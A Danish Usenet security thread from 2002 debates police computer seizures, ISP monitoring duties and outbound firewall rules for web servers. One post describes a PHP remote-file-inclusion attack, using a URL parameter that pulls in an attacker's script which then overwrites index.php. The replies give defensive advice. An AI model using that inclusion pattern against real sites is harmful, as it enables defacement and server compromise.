>(Enten af anmelderen selv, eller
>en cracker, der har haft kontrol over maskinen.) Hvis
>politiet skal kunne se, at der er hold i anklagen skal
>det ske enten ved at overvåge netkommunikationen

Hvilket kraever, at angriberen vender tilbage til samme offer.

>eller ved at undersøge angriberens maskine.

Det vil sige, at man skal undersoege angriberens maskine for at
finde ud af, om der er grundlag for at undersoege angriberens
maskine?


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 09:52

Allan Olesen wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> wrote:
>
> >Anmelderens logfiler er ikke ret meget mere bevis end
> >blot hans udtalelser. Logfilerne beviser intet, de kunne
> >nemt være forfalskede.
>
> Enig. Men min pointe var, at det i de fleste tilfaelde maa vaere
> alt, politiet har at stoette sig til, naar de skal bede en dommer
> om lov til at gaa videre i sagen.

Ja.

>
> >(Enten af anmelderen selv, eller
> >en cracker, der har haft kontrol over maskinen.) Hvis
> >politiet skal kunne se, at der er hold i anklagen skal
> >det ske enten ved at overvåge netkommunikationen
>
> Hvilket kraever, at angriberen vender tilbage til samme offer.

Det kommer an på, hvor på linien der aflyttes. En aflytning
i anmelderens ende er nok det nemmeste, men kræver naturligvis,
at der vendes tilbage til samme offer.

En aflytning i den anden ende af linien vil nok kræve en
dommerkendelse samt hjælp fra en ISP.

>
> >eller ved at undersøge angriberens maskine.
>
> Det vil sige, at man skal undersoege angriberens maskine for at
> finde ud af, om der er grundlag for at undersoege angriberens
> maskine?

Undersøgelsen af maskinen skal tjene som bevismateriale.
Jeg ønsker bare ikke, at politiet beslaglægger maskiner
på må og få. Hvis jeg bliver udsat for falske anklager
vil jeg hellere have, at politiet aflytter min forbindelse
end at de beslaglægger min computer.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Allan Olesen (16-09-2002)
Kommentar
Fra : Allan Olesen


Dato : 16-09-02 17:27

Kasper Dupont <kasperd@daimi.au.dk> wrote:

>> Hvilket kraever, at angriberen vender tilbage til samme offer.
>
>Det kommer an på, hvor på linien der aflyttes. En aflytning
>i anmelderens ende er nok det nemmeste, men kræver naturligvis,
>at der vendes tilbage til samme offer.
>
>En aflytning i den anden ende af linien vil nok kræve en
>dommerkendelse samt hjælp fra en ISP.

Praecis. Saa er vi tilbage ved, hvor mange beviser, der kraeves i
forbindelse med en anmeldelse.

>Undersøgelsen af maskinen skal tjene som bevismateriale.

Ja. Det er derfor, politiet beslaglaegger den. I en ideel verden
ville de maaske komme ud til dig med udstyr til at tage et image
af din harddisk, saa du ikke skulle undvaere din maskine, men
saadan er praksis tilsyneladende ikke, hvis man skal tro de
historier, man hoerer.

>Jeg ønsker bare ikke, at politiet beslaglægger maskiner
>på må og få. Hvis jeg bliver udsat for falske anklager
>vil jeg hellere have, at politiet aflytter min forbindelse
>end at de beslaglægger min computer.

Det loeber mig koldt ned ad ryggen.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 20:33

Allan Olesen wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> wrote:
>
> >Undersøgelsen af maskinen skal tjene som bevismateriale.
>
> Ja. Det er derfor, politiet beslaglaegger den. I en ideel verden
> ville de maaske komme ud til dig med udstyr til at tage et image
> af din harddisk, saa du ikke skulle undvaere din maskine, men
> saadan er praksis tilsyneladende ikke, hvis man skal tro de
> historier, man hoerer.

Jeg så engang i en fjernsynsudsendelse, at politiet har sådan noget
udstyr. Men i stedet for at tage udstyret med ud, så tager de ud og
henter maskinen og kører den ind til deres udstyr. Udsendelsen
meldte intet om, hvad der skete med maskinen bagefter.

>
> >Jeg ønsker bare ikke, at politiet beslaglægger maskiner
> >på må og få. Hvis jeg bliver udsat for falske anklager
> >vil jeg hellere have, at politiet aflytter min forbindelse
> >end at de beslaglægger min computer.
>
> Det loeber mig koldt ned ad ryggen.

Hvorfor?

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Allan Olesen (16-09-2002)
Kommentar
Fra : Allan Olesen


Dato : 16-09-02 21:11

Kasper Dupont <kasperd@daimi.au.dk> wrote:

>Jeg så engang i en fjernsynsudsendelse, at politiet har sådan noget
>udstyr. Men i stedet for at tage udstyret med ud, så tager de ud og
>henter maskinen og kører den ind til deres udstyr. Udsendelsen
>meldte intet om, hvad der skete med maskinen bagefter.

De beholder den sikkert nogle maaneder, saa man rigtigt kan
maerke, hvor slem man har vaeret...

>> Det loeber mig koldt ned ad ryggen.
>
>Hvorfor?

Hvis de kommer og henter min maskine, ved jeg i det mindste, at
der foregaar en efterforskning mod mig.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

Kasper Dupont (17-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 17-09-02 14:10

Allan Olesen wrote:
>
> >> Det loeber mig koldt ned ad ryggen.
> >
> >Hvorfor?
>
> Hvis de kommer og henter min maskine, ved jeg i det mindste, at
> der foregaar en efterforskning mod mig.

Ja, men på den anden side vil du jo så have et stort problem,
indtil du får din maskine igen. Hvis de bare overvåger nettet,
kan du leve videre i lykkelig uvidenhed. Du kan fortsætte med
at bruge din maskine, og de kan opdage, at der ikke er hold i
anklagerne og stoppe deres overvågning, uden at du nogensinde
behøver at bekymre dig. Bekymrer det dig, hvad de ser, ved at
overvåge din linie? Det bør man være forberedt på, der er
mange andre man har endnu mindre lyst til at have til at
overvåge sin linie.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Lasse Reichstein Nie~ (17-09-2002)
Kommentar
Fra : Lasse Reichstein Nie~


Dato : 17-09-02 15:27

Kasper Dupont <kasperd@daimi.au.dk> writes:

> Ja, men på den anden side vil du jo så have et stort problem,
> indtil du får din maskine igen. Hvis de bare overvåger nettet,
> kan du leve videre i lykkelig uvidenhed.

Jeg kunne også slå hovedet, gå i koma, og leve videre i "lykkelig"
uvidenhed. Jeg mener ikke uvidenhed er lykkelig.

> Du kan fortsætte med at bruge din maskine, og de kan opdage, at der
> ikke er hold i anklagerne og stoppe deres overvågning, uden at du
> nogensinde behøver at bekymre dig.

Jeg burde bekymre mig fra start. At jeg ikke ved det gør det ikke
mindre bekymringsværdigt.

> Bekymrer det dig, hvad de ser, ved at overvåge din linie?

I det omfang at det ikke rager dem, ja. I det omfang at den
information bliver gemt til evig tid og kan ende i hænderne
på snart sagt hvem som helst, ja. Hvis jeg vidste præcist
hvilke informationer der blev opfanget og hvordan den kunne
bruges, så ville jeg vide om det var godt eller skidt. Indtil
da er det bekymrende.

> Det bør man være forberedt på, der er mange andre man har endnu
> mindre lyst til at have til at overvåge sin linie.

Men for dem er det ulovligt at overvåge.

/L
--
Lasse Reichstein Nielsen - lrn@hotpop.com
'Faith without judgement merely degrades the spirit divine.'

Allan Olesen (18-09-2002)
Kommentar
Fra : Allan Olesen


Dato : 18-09-02 17:13

Kasper Dupont <kasperd@daimi.au.dk> wrote:

>Hvis de bare overvåger nettet,
>kan du leve videre i lykkelig uvidenhed.

Nu loeber det mig for alvor koldt ned ad ryggen.


--
Allan Olesen, Lunderskov.
Danske musikere tjener penge ved ulovlig softwarekopiering.

Thomas Strandtoft (15-09-2002)
Kommentar
Fra : Thomas Strandtoft


Dato : 15-09-02 12:49

Klaus Ellegaard wrote:

> >> Der er da ingen tvivl om, at udbyderen KAN undersøge sagen,
> >> spørgsmålet er om de MÅ.
>
> >Hvorfor skulle de ikke måtte det?
>
> ISPen kan ikke definere, at der er tale om noget ulovligt. Det
> kræver en dom.

Det er klart ISP ikke kan definere om det er lovligt eller
ulovligt, endsige afsige en dom, men de kan da godt undersøge
tingene.. Jeg kan heller ikke dømme folk for spritkørsel, men jeg
kan da godt lugte til en persons ånde inden vedkommende sætter sig
bag rattet og tilkalde politiet til en nærmere undersøgelse af
sagen hvis jeg mener der er noget om snakken.

> >Selvfølgelig må en ISP undersøge den trafik der ryger gennem deres
> >servere og forbindelser. Skulle trafikken så være af kriminel
> >karakter skal de overlade sagen til politiet.
>
> Det strider mod common-carrier-princippet. ISPen har intet ansvar
> for den trafik, der ryger gennem nettet, så længe ingen har gjort
> opmærksom på den.

Det er klart der ikke forlanges at ISP'erne skal overvåge al
trafikken, men hvis de får mistanke til at der foregår noget
ulovligt har de pligt til at melde det til politiet på lige fod
med det vi andre skal. Om de så kigger nok til at kunne få
mistanke skal jeg lade være usagt..

--
Hygge..
Thomas

<http://carftp.com> - a library of car videos.

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 13:05

Thomas Strandtoft <thomas.strandtoft@anderledes.dk> writes:

>Det er klart der ikke forlanges at ISP'erne skal overvåge al
>trafikken, men hvis de får mistanke til at der foregår noget
>ulovligt har de pligt til at melde det til politiet på lige fod
>med det vi andre skal. Om de så kigger nok til at kunne få
>mistanke skal jeg lade være usagt..

I det tilfælde vil man anbefale kunden, der har opdaget problemet,
om at tage kontakt til politiet. Det er svært at sidde med meget
få fakta og intet baggrundskendskab og lave en anmeldelse.

Når politiet så ringer og spørger ind til sagen, sidder man og
siger "øhm, det har brugeren ikke oplyst", "det ved jeg ikke",
"om det har stået på længe? Jeg ved ikke engang, om det er sandt".

Der er heller ingen grund til at undersøge sagen selv, for hvis
politiet straks kan afvise sagen, har man spildt en masse tid på
ingenting.

Det kan politiet ikke bruge til så meget.

Mvh.
   Klaus.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 16:03

Klaus Ellegaard wrote:
>
> Når politiet så ringer og spørger ind til sagen, sidder man og
> siger "øhm, det har brugeren ikke oplyst", "det ved jeg ikke",
> "om det har stået på længe? Jeg ved ikke engang, om det er sandt".

Det er netop derfor en ISP ikke skal anmelde uden at undersøge sagen.

>
> Der er heller ingen grund til at undersøge sagen selv, for hvis
> politiet straks kan afvise sagen, har man spildt en masse tid på
> ingenting.

Jeg mener ikke tiden er spildt, ISPen kan stadig afbryde kundens
netforbindelse. Og hvis politiet gang på gang ser gennem fingrene
med lovovertrædelser bør ISPen nok kontakte nogle andre. (Jeg ved
ikke hvem, justitsministeriet måske?)

>
> Det kan politiet ikke bruge til så meget.

Hvad?

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Kasper Dupont (14-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 14-09-02 18:06

Klaus Ellegaard wrote:
>
> Kim Hansen <k-tahf.qvxh@oek.dk> writes:
>
> >Udbydere er ikke interesseret i at skaffe sig af med uskyldige kunder,
> >så de sørger nok for at samle et par anmeldelser op, som evt. kan
> >verificeres vha. af egne log-filer før de reagere.
>
> Hvad har udbyderen af logfiler i den sammenhæng?

Udbyderen har nok ingen logfiler, men når der kommer
en anmeldelse kan de jo begynde at overvåge kunden.
Jeg ved ikke hvad loven siger, men jeg mener det
er bedre end alternativerne. Udbyderen skal ikke
skride til en politianmeldelse eller afbrydelse af
abonementet uden først at have nogen dokumentation.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Alex Holst (14-09-2002)
Kommentar
Fra : Alex Holst


Dato : 14-09-02 17:52

In dk.edb.sikkerhed Michael Andreasen <maskinen2000@hotmail.com> wrote:
> Så er det aligevel lykkedes mig at finde ud af hvordan de har gjort. Det er
> sågar lykkedes mig at downloade hele deres kode der har undnyttet mit
> sikkerhedshul. Det viser sig at være fordi jeg i min php kode har noget
> include, f.eks. www.domain.dk?include=doc.htm --- så har de simpelthen
> skrevet et lille php script som åbner index.php og overskriver den... og
> kaldt det med www.domain.dk?include=http://deresscript.php - pi...simpelt,
> men ganske effektivt.

Naar en angriber kan udfoere PHP kode efter eget valg paa din server er
der somregel ikke noget der stopper ham fra at oprette en reverse tunnel
af en art, enten gennem SSH eller blot en xterm. Han kan derfra begynde
at lede efter lokale sikkerhedsfejl som du ikke har patchet.

Ud over din fejl i PHP udviklingen er det ogsaa en stor fejl at du lader
din httpd (eller noget andet) have skrive-adgang til dit webtree.

David Wheeler's Secure Programing bog er gratis og der er ingen
undskyldning for ikke at laese den regelmaessigt. Der er specifikt et
afsnit om PHP:

http://www.dwheeler.com/secure-programs/

--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 10:05

Alex Holst wrote:
> Ud over din fejl i PHP udviklingen er det ogsaa en stor fejl at du lader
> din httpd (eller noget andet) have skrive-adgang til dit webtree.

Endvidere ser jeg det også som en stor fejl at give webserveren adgang
til Internet.


Claus U (15-09-2002)
Kommentar
Fra : Claus U


Dato : 15-09-02 10:25

Hi Christian E. Lysel du skrev:

>> Ud over din fejl i PHP udviklingen er det ogsaa en stor fejl at du lader
>> din httpd (eller noget andet) have skrive-adgang til dit webtree.
>
> Endvidere ser jeg det også som en stor fejl at give webserveren adgang
> til Internet.

Nah - men en sikkerhedsrisiko er det!

--
Claus U - http://www.cykeltyven.dk -
Dette indlæg er suppleret med en signaturadskiller der virker

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 10:27

Claus U wrote:
>>Endvidere ser jeg det også som en stor fejl at give webserveren adgang
>>til Internet.
> Nah - men en sikkerhedsrisiko er det!

Internet har adgang til webserveren, det er en sikkerhedsrisiko.

Men at give webserveren fuld adgang til Internet, det er en fejl.



Andreas Plesner Jaco~ (15-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 15-09-02 10:34

In article <3D84527E.20906@spindelnet.dk>, Christian E. Lysel wrote:

> Internet har adgang til webserveren, det er en sikkerhedsrisiko.
>
> Men at give webserveren fuld adgang til Internet, det er en fejl.

Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
webserver udfører?

--
Andreas Plesner Jacobsen | American by birth; Texan by the grace of God.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 11:14

Andreas Plesner Jacobsen wrote:
>
> In article <3D84527E.20906@spindelnet.dk>, Christian E. Lysel wrote:
>
> > Internet har adgang til webserveren, det er en sikkerhedsrisiko.
> >
> > Men at give webserveren fuld adgang til Internet, det er en fejl.
>
> Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
> webserver udfører?

Jeg kan ikke komme i tanke om mange webservere, der har brug for
at kunne hente filer med http. Jeg synes også det er en god idé
at lukke for webserverens mulighed for at forbinde sig til port
80 og 443 på eksterne maskiner. Hvis alle havde gjort det, ville
CodeRed og Nimda ikke have eksisteret.

I det konkrete tilfælde havde det nok ikke været nok at lukke
for de to porte. Selvom angrebet brugte port 80 kunne det lige
så vel have været udført med et vilkårligt andet portnummer. Så
det er nok bedst at lukke helt for webserverens mulighed for at
kontakte eksterne maskiner på nogen port.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Andreas Plesner Jaco~ (15-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 15-09-02 11:18

In article <3D845D5B.BFBED662@daimi.au.dk>, Kasper Dupont wrote:
>>
>> > Internet har adgang til webserveren, det er en sikkerhedsrisiko.
>> >
>> > Men at give webserveren fuld adgang til Internet, det er en fejl.
>>
>> Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
>> webserver udfører?
>
> Jeg kan ikke komme i tanke om mange webservere, der har brug for
> at kunne hente filer med http.

Jeg kan give et eksempel: http://validator.w3.org/
Men det var ikke pointen: Du kan ikke udtale dig om en given maskines
sikkerhedspolitik uden at kende maskinens formål.

> Jeg synes også det er en god idé
> at lukke for webserverens mulighed for at forbinde sig til port
> 80 og 443 på eksterne maskiner. Hvis alle havde gjort det, ville
> CodeRed og Nimda ikke have eksisteret.

Ganske enig.

--
Andreas Plesner Jacobsen | Help! I'm trapped in a Chinese computer factory!

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 11:53

Andreas Plesner Jacobsen wrote:
> Men det var ikke pointen: Du kan ikke udtale dig om en given maskines
> sikkerhedspolitik uden at kende maskinens formål.

Jeg kan godt se din pointe, håber du se min (at jeg er træt af at se
angrebet webservere der selv downloader sit angreb, fordi system
adminitratoren synes det er nemt på den måde)?


Andreas Plesner Jaco~ (15-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 15-09-02 11:58

In article <3D84667A.5030108@spindelnet.dk>, Christian E. Lysel wrote:

>> Men det var ikke pointen: Du kan ikke udtale dig om en given maskines
>> sikkerhedspolitik uden at kende maskinens formål.
>
> Jeg kan godt se din pointe, håber du se min (at jeg er træt af at se
> angrebet webservere der selv downloader sit angreb, fordi system
> adminitratoren synes det er nemt på den måde)?

Administratorerne af disse maskiner har helt andre basale problemer end
firewalls.

--
Andreas Plesner Jacobsen | You have junk mail.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 16:08

Andreas Plesner Jacobsen wrote:
>
> In article <3D845D5B.BFBED662@daimi.au.dk>, Kasper Dupont wrote:
> >>
> >> > Internet har adgang til webserveren, det er en sikkerhedsrisiko.
> >> >
> >> > Men at give webserveren fuld adgang til Internet, det er en fejl.
> >>
> >> Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
> >> webserver udfører?
> >
> > Jeg kan ikke komme i tanke om mange webservere, der har brug for
> > at kunne hente filer med http.
>
> Jeg kan give et eksempel: http://validator.w3.org/

De findes, og jeg kan da godt komme i tanke om et par eksempler
mere. Men det er stadig undtagelser.

> Men det var ikke pointen: Du kan ikke udtale dig om en given maskines
> sikkerhedspolitik uden at kende maskinens formål.

Indtil det modsatte er bevist, vil jeg gå ud fra, at der ikke
er brug for det.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 11:20

Kasper Dupont <kasperd@daimi.au.dk> writes:

>Jeg synes også det er en god idé
>at lukke for webserverens mulighed for at forbinde sig til port
>80 og 443 på eksterne maskiner. Hvis alle havde gjort det, ville
>CodeRed og Nimda ikke have eksisteret.

Jo, for der findes enestående mange webservere, der er installeret
uden folks viden om det (eller også har de bare glemt det). Det er
ikke muligt at lave firewallregler mod noget, man ikke ved, man
har.

Endvidere ville det stoppe alle personlige webservere, for det vil
så heller ikke være muligt at surfe fra den samme computer.

Så ja, tanken er god nok, men medmindre man indfører statstilskud
til en ekstra pc til alle med lyst til at køre webserver, vil det
nok ikke være praktisk muligt.

Mvh.
   Klaus.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 16:14

Klaus Ellegaard wrote:
>
> Kasper Dupont <kasperd@daimi.au.dk> writes:
>
> >Jeg synes også det er en god idé
> >at lukke for webserverens mulighed for at forbinde sig til port
> >80 og 443 på eksterne maskiner. Hvis alle havde gjort det, ville
> >CodeRed og Nimda ikke have eksisteret.
>
> Jo, for der findes enestående mange webservere, der er installeret
> uden folks viden om det (eller også har de bare glemt det).

Ja, men i det øjeblik nogen installere en webserver uden at
vide det, er det jo heller ikke mere alle, der beskytter deres
webserver med en firewall.

> Det er
> ikke muligt at lave firewallregler mod noget, man ikke ved, man
> har.

Nej.

>
> Endvidere ville det stoppe alle personlige webservere, for det vil
> så heller ikke være muligt at surfe fra den samme computer.

Man kan jo køre webserveren med et seperat bruger ID, og så
lave regler basseret på bruger ID. Det sikrer ikke mod orme,
der udnytter huller i OS. Men det sikrer mod orme, der kun
udnytter huller i serveren.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 11:51

Andreas Plesner Jacobsen wrote:
> Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
> webserver udfører?

Beskriv et eller to tilfælde hvor det er nødvendigt, og lad vær at
beskrive et tilfælde der kan løses med lidt omtanke, fx updatering af
webserveren, dette kan gøres ved at smide opdateringen på en CDROM og
smide denne i webserveren, eller at hente denne fra Internet fra et
andet segment og derfra distribuere denne til webserveren.

Du kommer med http://validator.w3.org/ som eksempel. Dette kan fx være
en webserver der sætter en validerings server på et andet segment igang.


Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 11:54

"Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> writes:

>> Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
>> webserver udfører?

>Beskriv et eller to tilfælde hvor det er nødvendigt,

En DSL-brugers egen webserver (han har kun én pc og et USB-modem).
Brugerens hjemmeside henter vejrdata fra DMI.

Mvh.
   Klaus.

Christian E. Lysel (15-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 15-09-02 12:29

Klaus Ellegaard wrote:
>>>Kan du virkelig udtale dig om det uden at vide, hvilke opgaver den
>>>webserver udfører?
>>Beskriv et eller to tilfælde hvor det er nødvendigt,
> En DSL-brugers egen webserver (han har kun én pc og et USB-modem).
> Brugerens hjemmeside henter vejrdata fra DMI.

Og har lavet en aftale med DMI om at han/hun godt må det? Hvis man
tegner en sådan aftale har man typisk råd til at bygge en ordenlig
infrastruktur.

Anyway, jeg ville nok i dette tilfælde vælge at kører OpenBSD med
systrace på webserveren. systrace ville jeg sætte op således at når
processen går på nettet må den kun lave http forspørgelser til DMI.


Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 12:51

"Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> writes:

>> En DSL-brugers egen webserver (han har kun én pc og et USB-modem).
>> Brugerens hjemmeside henter vejrdata fra DMI.

>Og har lavet en aftale med DMI om at han/hun godt må det? Hvis man
>tegner en sådan aftale har man typisk råd til at bygge en ordenlig
>infrastruktur.

Så erstat DMI med www.gratis-data-til-at-proppe-paa-dit-website.dk
eller noget andet. Det er jo ligegyldigt for diskussionen.

>Anyway, jeg ville nok i dette tilfælde vælge at kører OpenBSD med
>systrace på webserveren. systrace ville jeg sætte op således at når
>processen går på nettet må den kun lave http forspørgelser til DMI.

Brugeren kører Windows - han kan ikke finde ud af andet, og han
har kun én pc. Hvis kan også skal kunne køre Word og spille, er
OpenBSD nok et rigtigt skidt valg. Fås der i øvrigt proprietære
USB-modem-drivere til OpenBSD?

Mvh.
   Klaus.

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 16:23

Klaus Ellegaard wrote:
>
> "Christian E. Lysel" <sunsite.dk.nntp@spindelnet.dk> writes:
>
> >> En DSL-brugers egen webserver (han har kun én pc og et USB-modem).
> >> Brugerens hjemmeside henter vejrdata fra DMI.
>
> >Og har lavet en aftale med DMI om at han/hun godt må det? Hvis man
> >tegner en sådan aftale har man typisk råd til at bygge en ordenlig
> >infrastruktur.
>
> Så erstat DMI med www.gratis-data-til-at-proppe-paa-dit-website.dk
> eller noget andet. Det er jo ligegyldigt for diskussionen.

Du kan stadig begrænse webadgangen til de servere, du har brug for.
Hvis den pågældende server medvirker i angrebet har du selvfølgelig
et problem, men det havde nok ikke været tilfældet i den konkrete
sag.

>
> >Anyway, jeg ville nok i dette tilfælde vælge at kører OpenBSD med
> >systrace på webserveren. systrace ville jeg sætte op således at når
> >processen går på nettet må den kun lave http forspørgelser til DMI.
>
> Brugeren kører Windows - han kan ikke finde ud af andet, og han
> har kun én pc.

I det tilfælde kan vores diskution være fuldstændig ligegyldig.
Uanset hvilken løsning vi måtte nå frem til, kan brugeren alligevel
ikke finde ud af at sætte det rigtigt op.

> Hvis kan også skal kunne køre Word og spille, er
> OpenBSD nok et rigtigt skidt valg.

Det ville da bare kræve, at Microsoft gik i gang med at portere
Word og deres spil til OpenBSD.

> Fås der i øvrigt proprietære
> USB-modem-drivere til OpenBSD?

Aner det ikke. Men jeg kan tilgengæld fortælle dig, at mit SB4100
USB Kabel Modem virker under Linux. (På trods af at min ISP siger
noget andet.)

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Andreas Plesner Jaco~ (15-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 15-09-02 21:18

In article <3D84A5BB.9A17889D@daimi.au.dk>, Kasper Dupont wrote:
>
>> Hvis kan også skal kunne køre Word og spille, er
>> OpenBSD nok et rigtigt skidt valg.
>
> Det ville da bare kræve, at Microsoft gik i gang med at portere
> Word og deres spil til OpenBSD.

Det er sgu ikke underligt at man bliver nødt til at holde ferie fra
denne gruppe til tider.

--
Andreas Plesner Jacobsen | Everyone is in the best seat.
|    -- John Cage

Kasper Dupont (15-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 15-09-02 22:18

Andreas Plesner Jacobsen wrote:
>
> In article <3D84A5BB.9A17889D@daimi.au.dk>, Kasper Dupont wrote:
> >
> >> Hvis kan også skal kunne køre Word og spille, er
> >> OpenBSD nok et rigtigt skidt valg.
> >
> > Det ville da bare kræve, at Microsoft gik i gang med at portere
> > Word og deres spil til OpenBSD.
>
> Det er sgu ikke underligt at man bliver nødt til at holde ferie fra
> denne gruppe til tider.

Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.
Det er der vel næppe nogen, der vil benægte? At det så ikke hjælper
ret meget, er en anden sag.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Klaus Ellegaard (15-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 15-09-02 22:22

Kasper Dupont <kasperd@daimi.au.dk> writes:

>> Det er sgu ikke underligt at man bliver nødt til at holde ferie fra
>> denne gruppe til tider.

>Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.
>Det er der vel næppe nogen, der vil benægte? At det så ikke hjælper
>ret meget, er en anden sag.

Ikke for at trolle, men hvis brugerens behov er Word og webservice,
opfylder OpenBSD og venner kravene, og er derfor totalt ubrugelige.

Så kan det være nok så sikkert, men det er lige så elendigt, som
det er sikkert i denne sammenhæng.

Mvh.
   Klaus.

Kasper Dupont (16-09-2002)
Kommentar
Fra : Kasper Dupont


Dato : 16-09-02 07:20

Klaus Ellegaard wrote:
>
> Ikke for at trolle, men hvis brugerens behov er Word og webservice,
> opfylder OpenBSD og venner kravene, og er derfor totalt ubrugelige.

Hvis brugeren har brug for en sikker webservice opfylder Microsoft
ikke kravene. Hvis brugeren har brug for et tekstbehandlingsprogram
til BSD opfylder Word ikke kravene.

--
Kasper Dupont -- der bruger for meget tid på usenet.
For sending spam use mailto:aaarep@daimi.au.dk
or mailto:mcxumhvenwblvtl@skrammel.yaboo.dk

Andreas Plesner Jaco~ (16-09-2002)
Kommentar
Fra : Andreas Plesner Jaco~


Dato : 16-09-02 09:15

In article <3D84F8F1.90767384@daimi.au.dk>, Kasper Dupont wrote:
>>
>> Det er sgu ikke underligt at man bliver nødt til at holde ferie fra
>> denne gruppe til tider.
>
> Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.
> Det er der vel næppe nogen, der vil benægte? At det så ikke hjælper
> ret meget, er en anden sag.

Ja, hvis man er så akademisk anlagt som nogle tilsyneladende insisterer
på at være.

--
Andreas Plesner Jacobsen | "What time is it?"
| "I don't know, it keeps changing."

Klaus Ellegaard (16-09-2002)
Kommentar
Fra : Klaus Ellegaard


Dato : 16-09-02 10:16

Andreas Plesner Jacobsen <apj@daarligstil.dk> writes:

>> Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.
>> Det er der vel næppe nogen, der vil benægte? At det så ikke hjælper
>> ret meget, er en anden sag.

>Ja, hvis man er så akademisk anlagt som nogle tilsyneladende insisterer
>på at være.

Eller sagt på en anden måde: brugeren har brug for Word (der kan
åbne samtlige dokumenter og aldrig nogensinde har konverterings-
fejl) *og* en webserver. Kunden har én maskine.

Er BSD brugbart?

Hvis svaret er andet end et ubetinget "ja", duer BSD ikke til noget.
Det er ikke Microsofts fejl, det er ikke BSDs fejl, det er ikke
brugerens fejl. Sådan er det bare.

Mvh.
   Klaus.

Christian E. Lysel (16-09-2002)
Kommentar
Fra : Christian E. Lysel


Dato : 16-09-02 10:27

Klaus Ellegaard wrote:
> Er BSD brugbart?

Hvem har sagt brugeren _skal_ bruge BSD?

Jeg skrev at hvis det var mig (der ikke havde råd til en bedre
infrastruktur) ville jeg bruge systrace under OpenBSD.


Lasse Reichstein Nie~ (16-09-2002)
Kommentar
Fra : Lasse Reichstein Nie~


Dato : 16-09-02 09:30

Kasper Dupont <kasperd@daimi.au.dk> writes:

> Hvis Word ikke kører på BSD, må den primære årsag da være Microsoft.

Nej da. Det er da lige så meget BSD-folkene der ikke har
porteret/skrevet Word til BSD endnu. De ville nok blive nødt til at
kalde det noget andet, men bliver det mindre Word af det?

